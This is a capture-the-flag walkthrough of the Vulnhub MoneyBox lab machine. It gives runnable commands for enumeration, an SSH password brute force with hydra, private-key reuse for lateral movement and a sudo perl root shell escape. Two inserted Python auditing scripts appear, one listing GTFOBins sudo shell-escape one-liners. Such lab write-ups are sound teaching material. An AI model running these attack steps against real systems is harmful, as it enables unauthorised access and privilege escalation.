MoneyBox Walkthrough – Vulnhub – Writeup
MoneyBox is an easy machine from Vulnhub. If you haven’t tried it yet, I suggest you do so before reading on.
Link to the machine: https://www.vulnhub.com/entry/moneybox-1,653/
From this machine, we can learn:
- Basic enumeration of HTTP
- Steganography using steghide
- Basics of SSH
- Abusing a sudo rule for root privilege escalation
Identify the target
First of all, I identified the IP address of the target machine.
sudo netdiscover -i eth0 -r 10.0.2.0/24
Scan open ports
Next, I scanned the open ports to identify the exposed services.
sudo nmap -v -T4 -A -p- -oN nmap.log 10.0.2.53
The nmap output flags FTP with anonymous login allowed, so I logged in. In the lftp command below, the trailing comma after the username passes an empty password.
Anonymous FTP access
lftp -u anonymous, 10.0.2.53
The FTP share contained an image, trytofind.jpg, which I downloaded to my local machine. I first tried extracting data with steghide and an empty passphrase, but that returned nothing.
steghide extract -sf trytofind.jpg
Brute-forcing the passphrase with stegseek and rockyou.txt also found nothing.
stegseek trytofind.jpg /home/kali/rockyou.txt
So the passphrase must be found somewhere else on the target.
Enumerate the webserver
The default page gives nothing away.
Brute-forcing directories on the webserver turned up one path.
gobuster dir -u http://10.0.2.53 -x txt,php,html,bak --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o dir.log
Upon curling the path, I found a hint.
curl -L 10.0.2.53/blogs
The page source contained a comment pointing at another path.
curl -L 10.0.2.53/S3cr3t-T3xt
This page holds the secret key, which is the passphrase for the steganography.
Steganography
Steganography hides data inside another file. steghide embeds into JPEG, BMP, WAV and AU files, so a JPEG sitting on an anonymous FTP share is a strong hint that steghide was used. With the secret key from the web page entered at the passphrase prompt, extraction succeeds:
steghide extract -sf trytofind.jpg
It wrote the embedded payload to a new file, data.txt, which hints at a username on the target.
cat data.txt
Hello..... renu
I tell you something Important.Your Password is too Week So Change Your Password
Don't Underestimate it.......
The file gives us the username renu and says the password is weak, so brute-forcing the SSH login with a wordlist is the obvious next step.
Bruteforce
hydra -l renu -P /home/kali/rockyou.txt 10.0.2.53 ssh
We were able to crack the password. Hence, I logged in as renu and got the user flag.
ssh renu@10.0.2.53
ls -al
cat user1.txt
Escalate to different user
When I listed the home directories, I found another user on the machine.
cd /home
ls -al
In lily's home directory there is a readable .ssh directory.
cd /home/lily
ls -al
cd .ssh
ls -al
cat authorized_keys
The .ssh directory has an authorized_keys file containing the public key of the user renu. Any private key that matches an entry in a user's authorized_keys can log in as that user, so renu's id_rsa gives us a shell as lily. There are two ways to use it. First, copy renu's private key to the attacking machine and log in from there.
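Before copying keys around, it is worth confirming that the entry in lily's authorized_keys really is renu's key, by key material rather than by the trailing comment (which is free text anyone can write). On the box, `ssh-keygen -y -f ~/.ssh/id_rsa` prints renu's public key and `ssh-keygen -lf authorized_keys` prints fingerprints. The following Python script, added here as an example and not part of the original write-up, does the same comparison offline: it parses each authorized_keys entry (including options such as from= and no-pty), computes the SHA256 fingerprint ssh-keygen would show, and reports whether a given public key line is present. The key blobs and the authorized_keys text are synthetic samples constructed inside the script, not the files from the target.

```python
import base64
import hashlib
import struct
from typing import Dict, List, Optional

# Key types accepted on an authorized_keys line (OpenSSH's common ones).
KEY_TYPES = {
    "ssh-rsa", "ssh-dss", "ssh-ed25519",
    "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521",
    "sk-ssh-ed25519@openssh.com", "sk-ecdsa-sha2-nistp256@openssh.com",
}


def _ssh_string(b: bytes) -> bytes:
    """RFC 4251 'string': 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(b)) + b


def _ssh_mpint(i: int) -> bytes:
    """RFC 4251 'mpint': big-endian magnitude, leading 0x00 if the top bit is set."""
    b = i.to_bytes((i.bit_length() + 7) // 8, "big")
    if b and b[0] & 0x80:
        b = b"\x00" + b
    return _ssh_string(b)


def _read_string(buf: bytes, off: int):
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4:off + 4 + n], off + 4 + n


def _split_outside_quotes(s: str, sep: str) -> List[str]:
    """Split on sep, but not inside double quotes (needed for command="..." options)."""
    out, cur, in_q = [], [], False
    for ch in s:
        if ch == '"':
            in_q = not in_q
        if ch == sep and not in_q:
            out.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    out.append("".join(cur))
    return out


def fingerprint(blob: bytes) -> str:
    """What ssh-keygen -lf prints: SHA256 of the wire-format key, base64 without padding."""
    return "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")


def parse_authorized_key(line: str) -> Optional[Dict]:
    """Parse one authorized_keys line into options, type, wire blob, comment and fingerprint."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    fields = [f for f in _split_outside_quotes(line, " ") if f]
    options: List[str] = []
    if fields[0] not in KEY_TYPES:              # options, if any, precede the key type
        options = _split_outside_quotes(fields.pop(0), ",")
    if len(fields) < 2:
        raise ValueError("malformed authorized_keys line: %r" % line)
    key_type, b64 = fields[0], fields[1]
    blob = base64.b64decode(b64, validate=True)
    declared, _ = _read_string(blob, 0)
    if declared.decode() != key_type:           # the blob embeds its own type; they must agree
        raise ValueError("key type %s does not match blob type %r" % (key_type, declared))
    return {"type": key_type, "blob": blob, "comment": " ".join(fields[2:]),
            "options": options, "fingerprint": fingerprint(blob)}


def audit(authorized_keys_text: str) -> List[Dict]:
    return [e for e in map(parse_authorized_key, authorized_keys_text.splitlines()) if e]


def find_key(pubkey_line: str, authorized_keys_text: str) -> Optional[Dict]:
    """Match on key material only; comments such as 'renu@moneybox' prove nothing."""
    wanted = parse_authorized_key(pubkey_line)
    for entry in audit(authorized_keys_text):
        if entry["blob"] == wanted["blob"]:
            return entry
    return None


# --- constructed sample data: synthetic key material, not the keys from the target ---
def _b64(b: bytes) -> str:
    return base64.b64encode(b).decode()


_RSA_BLOB = _ssh_string(b"ssh-rsa") + _ssh_mpint(65537) + _ssh_mpint((1 << 2047) | 0x10001)
_ED_BLOB = _ssh_string(b"ssh-ed25519") + _ssh_string(bytes(range(32)))
_OTHER_BLOB = _ssh_string(b"ssh-ed25519") + _ssh_string(bytes(range(32, 64)))

RENU_PUB_LINE = "ssh-rsa " + _b64(_RSA_BLOB) + " renu@moneybox"   # as ssh-keygen -y -f id_rsa would print
OTHER_PUB_LINE = "ssh-ed25519 " + _b64(_OTHER_BLOB)                # a key that is NOT authorised
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# constructed sample of /home/lily/.ssh/authorized_keys",
    'from="10.0.2.0/24",no-pty ssh-ed25519 ' + _b64(_ED_BLOB) + " backup@nas",
    "ssh-rsa " + _b64(_RSA_BLOB) + " renu@moneybox",
])

if __name__ == "__main__":
    for e in audit(SAMPLE_AUTHORIZED_KEYS):
        print(e["type"], e["fingerprint"], e["comment"], e["options"])
    hit = find_key(RENU_PUB_LINE.rsplit(" ", 1)[0], SAMPLE_AUTHORIZED_KEYS)
    print("renu's key is authorised for this account:", hit is not None)
```

Feed it the real files with `audit(open("authorized_keys").read())` and the output of `ssh-keygen -y -f id_rsa`; a match on the blob, not on the comment, is what justifies the next step.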
scp renu@10.0.2.53:~/.ssh/id_rsa .
scp pulls the key over the SSH session we already have, which is cleaner than exposing it through an ad-hoc HTTP server. Make sure the local copy is still mode 0600, since ssh refuses a private key that other users can read. Now we can log in with the key we just copied into the current directory:
ssh -i id_rsa lily@10.0.2.53
Alternatively, we can switch to lily from the target itself by using renu's key to ssh to localhost.
cd
ssh lily@localhost -i .ssh/id_rsa
From here, we can read the second user flag.
cat user2.txt
Root privilege escalation
From lily, we can check the sudo permissions.
sudo -l
The output shows that lily may run perl through sudo as any user, root included. perl can spawn a shell, so this is a direct path to root; GTFOBins documents the one-liner.
References: https://gtfobins.github.io/gtfobins/perl/#sudo
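A quick way to see what a `sudo -l` listing actually grants, added here as an example and not part of the original write-up: the script below parses each rule's runas specification, NOPASSWD tag and command list, flags commands that are ALL or a binary with a documented GTFOBins sudo shell escape, and notes whether the rule pins the arguments (in which case the generic one-liner is rejected unless it fits the permitted command line). The listing it reads is a constructed sample modelled on the usual sudo -l format, not the real output from MoneyBox, and the escape table is a small illustrative subset chosen by the editor.

```python
import os
import re
from typing import Dict, List

# Binaries with a documented sudo shell escape on GTFOBins (illustrative subset,
# assumption: this selection is the editor's, not the page's), with the usual one-liner.
SHELL_ESCAPES: Dict[str, str] = {
    "perl":    "sudo perl -e 'exec \"/bin/sh\";'",
    "python":  "sudo python -c 'import os; os.system(\"/bin/sh\")'",
    "python3": "sudo python3 -c 'import os; os.system(\"/bin/sh\")'",
    "find":    "sudo find . -exec /bin/sh \\; -quit",
    "vim":     "sudo vim -c ':!/bin/sh'",
    "awk":     "sudo awk 'BEGIN {system(\"/bin/sh\")}'",
    "env":     "sudo env /bin/sh",
    "less":    "sudo less /etc/profile   (then type !/bin/sh at the pager prompt)",
    "bash":    "sudo bash",
    "sh":      "sudo sh",
}

# One sudo -l rule line: (runas_user[ : runas_group]) [TAG: ...] command[, command ...]
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text: str) -> List[Dict]:
    """Extract the rule lines from sudo -l output; Defaults and header lines are skipped."""
    rules = []
    for raw in text.splitlines():
        m = RULE_RE.match(raw.strip())
        if not m:
            continue
        runas_user = m.group("runas").split(":")[0].strip()
        tags = [t.rstrip(":") for t in m.group("tags").split()]
        commands = [c.strip() for c in re.split(r",\s+", m.group("cmds"))]
        rules.append({"runas": runas_user, "nopasswd": "NOPASSWD" in tags,
                      "setenv": "SETENV" in tags, "commands": commands})
    return rules


def audit_sudo(text: str) -> List[Dict]:
    """Flag rules whose command is ALL or a binary known to give a shell."""
    findings = []
    for rule in parse_sudo_l(text):
        for cmd in rule["commands"]:
            argv = cmd.split()
            binary = "ALL" if cmd == "ALL" else os.path.basename(argv[0])
            if binary != "ALL" and binary not in SHELL_ESCAPES:
                continue
            findings.append({
                "binary": binary,
                "command": cmd,
                "runas": rule["runas"],
                "gives_root": rule["runas"] in ("ALL", "root"),
                "nopasswd": rule["nopasswd"],
                # sudo matches the whole command line, so pinned arguments block the generic escape
                "args_restricted": len(argv) > 1,
                "escape": "any command" if binary == "ALL" else SHELL_ESCAPES[binary],
            })
    return findings


# Constructed sample in the usual sudo -l layout; not the real listing from the target.
SAMPLE_SUDO_L = r"""
Matching Defaults entries for lily on MoneyBox:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lily may run the following commands on MoneyBox:
    (ALL) NOPASSWD: /usr/bin/perl
    (root) /usr/sbin/service apache2 restart, /bin/cat /var/log/apache2/error.log
    (www-data : www-data) NOPASSWD: /usr/bin/find
"""

if __name__ == "__main__":
    for f in audit_sudo(SAMPLE_SUDO_L):
        who = "root" if f["gives_root"] else f["runas"]
        print(f"{f['command']} as {who}"
              f"{' without a password' if f['nopasswd'] else ''}"
              f"{' (arguments pinned)' if f['args_restricted'] else ''}: {f['escape']}")
```

Pipe the real listing in with `audit_sudo(subprocess.run(["sudo", "-l"], capture_output=True, text=True).stdout)` on the target; a finding with gives_root and no argument restriction is the case the perl one-liner below exploits, while a hit that only runs as another unprivileged user is a lateral move, not root.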
sudo perl -e 'exec "/bin/bash";'
cd
ls -al
cat .root.txt